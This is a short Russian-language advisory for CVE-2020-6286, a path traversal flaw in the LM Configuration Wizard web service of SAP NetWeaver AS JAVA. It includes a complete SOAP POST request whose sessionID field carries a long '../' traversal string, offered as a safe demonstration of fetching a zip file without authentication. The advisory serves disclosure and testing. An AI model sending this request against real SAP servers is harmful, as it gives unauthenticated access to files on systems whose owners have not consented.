
[CVE-2020-6286] SAP NetWeaver AS JAVA (LM Configuration Wizard) Обход каталога
[CVE-2020-6286] SAP NetWeaver AS JAVA (LM Configuration Wizard) Обход каталогов
SAP NetWeaver — это интегрированная технологическая платформа SAP и техническая основа всех приложений SAP, начиная с SAP Business Suite. SAP NetWeaver представляет собой сервис-ориентированную платформу для приложений и интеграции, которая предоставляет среду разработки и выполнения для приложений SAP, а также может использоваться для индивидуальной разработки и интеграции с другими приложениями и системами. Недостаточная проверка входного пути определённого параметра в веб-сервисе SAP NetWeaver AS JAVA (LM Configuration Wizard) версий 7.30, 7.31, 7.40, 7.50 позволяет неаутентифицированному злоумышленнику использовать метод для загрузки zip-файлов в определённую директорию, что приводит к обходу пути (Path Traversal).
Для безопасной демонстрации уязвимости можно использовать следующий запрос. Если zip-файл существует на удалённом хосте, то он загружает файл 111.zip
POST /CTCWebService/CTCWebServiceBean HTTP/1.1
Host: host
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Type: text/xml;charset=UTF-8
SOAPAction:
Content-Length: 340
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi">
<soapenv:Header />
<soapenv:Body>
<urn:queryProtocol>
<sessionID>/../../../../../../../../../../../../../../../../../..111</sessionID>
</urn:queryProtocol>
</soapenv:Body>
</soapenv:Envelope>